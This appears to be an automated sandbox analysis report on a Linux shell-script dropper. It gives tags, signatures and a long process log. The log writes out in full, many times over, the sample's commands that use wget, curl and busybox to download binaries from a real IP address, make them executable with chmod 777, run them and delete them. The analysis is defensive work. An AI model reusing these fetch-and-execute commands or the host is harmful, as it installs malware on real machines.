Malware Analysis Report

2025-05-06 04:15

Sample ID 241025-bvk3ys1dja
Target 402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
SHA256 402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb
Tags
defense_evasion discovery antivm
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb

Threat Level: Shows suspicious behavior

The file 402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Writes file to tmp directory

Reads runtime system information

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-25 01:27

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-25 01:27

Reported

2024-10-25 01:30

Platform

ubuntu1804-amd64-20240729-en

Max time kernel

11s

Max time network

128s

Command Line

[/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO N/A
N/A /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy N/A
N/A /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt N/A
N/A /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM N/A
N/A /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 N/A
N/A /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn N/A
N/A /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK N/A
N/A /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq N/A
N/A /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 N/A
N/A /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI N/A
N/A /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw N/A
N/A /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 N/A
N/A /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj N/A
N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj N/A
N/A /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM N/A
N/A /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 N/A
N/A /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn N/A
N/A /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO N/A
N/A /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy N/A
N/A /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt N/A
N/A /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq N/A
N/A /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK N/A
N/A /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 N/A
N/A /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 N/A
N/A /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI N/A
N/A /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A N/A /bin/rm N/A
N/A N/A /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /usr/bin/curl N/A
File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /usr/bin/curl N/A
File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /usr/bin/curl N/A
File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /usr/bin/curl N/A
File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /usr/bin/curl N/A
File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /usr/bin/curl N/A
File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /usr/bin/curl N/A
File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /usr/bin/curl N/A
File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /usr/bin/curl N/A
File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /usr/bin/curl N/A
File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /usr/bin/curl N/A
File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /usr/bin/curl N/A
File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /usr/bin/curl N/A
File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /usr/bin/curl N/A
File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /usr/bin/curl N/A
File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /usr/bin/curl N/A
File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /usr/bin/curl N/A
File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /usr/bin/curl N/A
File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /usr/bin/curl N/A
File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /usr/bin/curl N/A
File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /usr/bin/curl N/A
File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /usr/bin/curl N/A
File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /usr/bin/curl N/A
File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /usr/bin/curl N/A
File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /usr/bin/curl N/A
File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /usr/bin/curl N/A
File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /usr/bin/curl N/A
File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /usr/bin/curl N/A

Processes

/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh

[/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/chmod

[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO

[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/rm

[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/wget

[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/chmod

[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy

[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/rm

[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/chmod

[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt

[./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/rm

[rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/wget

[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/chmod

[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM

[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/rm

[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/wget

[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/chmod

[chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2

[./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/rm

[rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/wget

[wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/chmod

[chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn

[./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/rm

[rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/wget

[wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/chmod

[chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK

[./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/rm

[rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/wget

[wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/chmod

[chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq

[./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/rm

[rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/wget

[wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/chmod

[chmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2

[./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/rm

[rm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/wget

[wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/chmod

[chmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI

[./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/bin/rm

[rm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI]

/usr/bin/wget

[wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/chmod

[chmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw

[./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/bin/rm

[rm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw]

/usr/bin/wget

[wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/chmod

[chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4

[./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/rm

[rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/wget

[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/chmod

[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj

[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/rm

[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/wget

[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/chmod

[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz

[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/rm

[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/wget

[wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/chmod

[chmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz

[./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/bin/rm

[rm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz]

/usr/bin/wget

[wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/chmod

[chmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj

[./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/bin/rm

[rm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj]

/usr/bin/wget

[wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/chmod

[chmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM

[./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/bin/rm

[rm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM]

/usr/bin/wget

[wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/chmod

[chmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2

[./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/bin/rm

[rm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2]

/usr/bin/wget

[wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/chmod

[chmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn

[./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/bin/rm

[rm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn]

/usr/bin/wget

[wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/chmod

[chmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO

[./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/bin/rm

[rm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO]

/usr/bin/wget

[wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/chmod

[chmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy

[./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/bin/rm

[rm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy]

/usr/bin/wget

[wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/chmod

[chmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt

[./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/bin/rm

[rm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt]

/usr/bin/wget

[wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/chmod

[chmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq

[./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/bin/rm

[rm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq]

/usr/bin/wget

[wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/chmod

[chmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK

[./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/bin/rm

[rm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK]

/usr/bin/wget

[wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/chmod

[chmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4

[./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/bin/rm

[rm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4]

/usr/bin/wget

[wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2]

/bin/busybox

